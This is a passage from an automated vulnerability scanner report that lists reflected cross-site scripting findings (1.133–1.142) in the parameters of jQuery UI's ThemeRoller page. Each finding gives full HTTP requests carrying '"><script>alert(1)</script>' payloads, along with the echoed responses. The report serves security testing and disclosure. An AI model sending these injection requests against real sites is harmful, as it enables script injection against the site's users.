   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.pngd09d8"><script>alert(1)</script>0a734e37c76&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

1.133. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22462"><script>alert(1)</script>158eccff51d was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png22462"><script>alert(1)</script>158eccff51d&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png22462"><script>alert(1)</script>158eccff51d&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

1.134. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18966"><script>alert(1)</script>76f50b8c74f was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png18966"><script>alert(1)</script>76f50b8c74f&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png18966"><script>alert(1)</script>76f50b8c74f&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

1.135. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45aa"><script>alert(1)</script>5e1a910598 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngf45aa"><script>alert(1)</script>5e1a910598&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119999

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngf45aa"><script>alert(1)</script>5e1a910598&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

1.136. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56912"><script>alert(1)</script>cb967ee3044 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png56912"><script>alert(1)</script>cb967ee3044&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png56912"><script>alert(1)</script>cb967ee3044&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

1.137. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef5cf"><script>alert(1)</script>848687395fd was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngef5cf"><script>alert(1)</script>848687395fd&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngef5cf"><script>alert(1)</script>848687395fd&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

1.138. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f226"><script>alert(1)</script>12c5cb4ea52 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png8f226"><script>alert(1)</script>12c5cb4ea52&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png8f226"><script>alert(1)</script>12c5cb4ea52&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

1.139. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5920"><script>alert(1)</script>0da440e482d was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga5920"><script>alert(1)</script>0da440e482d&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.pnga5920"><script>alert(1)</script>0da440e482d&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

1.140. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aed5"><script>alert(1)</script>c7a43f5d90f was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1aed5"><script>alert(1)</script>c7a43f5d90f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120001

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png1aed5"><script>alert(1)</script>c7a43f5d90f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.141. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e26"><script>alert(1)</script>dd6062138ed was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa14e26"><script>alert(1)</script>dd6062138ed&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 09 Feb 2011 12:26:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa14e26"><script>alert(1)</script>dd6062138ed&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColor
...[SNIP]...

1.142. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0563"><script>alert(1)</script>fc3d1d00bb8 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

